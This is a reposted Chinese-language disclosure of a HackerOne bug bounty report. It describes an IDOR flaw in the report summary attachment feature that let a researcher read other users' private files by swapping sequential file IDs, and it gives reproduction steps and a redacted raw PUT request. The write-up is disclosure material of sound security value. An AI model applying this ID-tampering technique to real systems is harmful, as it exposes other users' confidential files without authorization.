Hackerone 附件功能存在IDOR越权漏洞15000$

admin 2024年5月2日03:03:32评论4 views字数 1498阅读4分59秒阅读模式
-->进入正题啦

Hackerone 披露报告
Hackerone 提供了一种用于向各种程序报告漏洞的表格。其中表单支持上传文件和预览(图像或视频),但不允许使用属于其他帐户的文件 ID。但通过摘要报告功能,作为一名黑客,我只需更改 ID 即可泄露属于其他用户的文件。这是非常严重的。

我尝试通过提交报告、编辑报告表单调用属于其他帐户的文件,但它不起作用,它总是得到响应 "was_successful":false, 。但幸运的是,我可以找到另一个端点,该端点能够读取属于其他帐户的文件,即在摘要报告功能中。

Hackerone 附件功能存在IDOR越权漏洞15000$

复现步骤:

  1. 攻击者创建草稿或现有报告,然后创建黑客摘要
  2. 然后编辑摘要并将文件提供给。
  3. 拦截与拦截将攻击者文件ID更改为受害者文件ID
  4. 在Markdown预览中读取boom文件。

原始请求:

附件通过添加摘要报告泄露:受害者文件ID:3155239我会将 F3155244 更改为 3155239攻击者文件:31552413155242“was_successful”:true,(如果文件来自攻击者)我将更改为受害者文件“was_successful”:假,将假尝试通过内容泄漏:误报通过摘要泄漏:成功

受影响端点

PUT /reports/████/summaries/███████ HTTP/2Host: hackerone.com.....all header ...Content-Length: 908Origin: https://hackerone.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailers

{"id":████████,"category":"researcher","content":"TESTEDITnn{F3155244} ","updated_at":"2024-03-30T17:16:29.625Z","user":{"id":█████,"username":"█████","name":"██████████████","bio":"please see pdfx","cleared":false,"verified":false,"website":null,"location":"","created_at":"2024-03-29T11:27:50.077Z","url":"https://hackerone.com/██████████","hackerone_triager":false,"hackerone_employee":false,"user_type":"hacker","profile_picture_urls":{"small":"/assets/avatars/default-█████.png","medium":"/assets/avatars/default-███████.png","xtralarge":"/assets/avatars/default-███████.png"}},"can_view?":true,"can_create?":true,"attachments":[],"action_type":"publish","attachment_ids":[3155239]}


漏洞影响:
这是非常糟糕的,尤其是 id 形式只是按顺序排列的数字。我可以添加 hackerone 帐户的所有文件 ID,如果是视频的话我可以看到其他人的poc。

原文始发于微信公众号(重生者安全团队):Hackerone 附件功能存在IDOR越权漏洞15000$

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月2日03:03:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Hackerone 附件功能存在IDOR越权漏洞15000$https://cn-sec.com/archives/2705241.html

发表评论

匿名网友 填写信息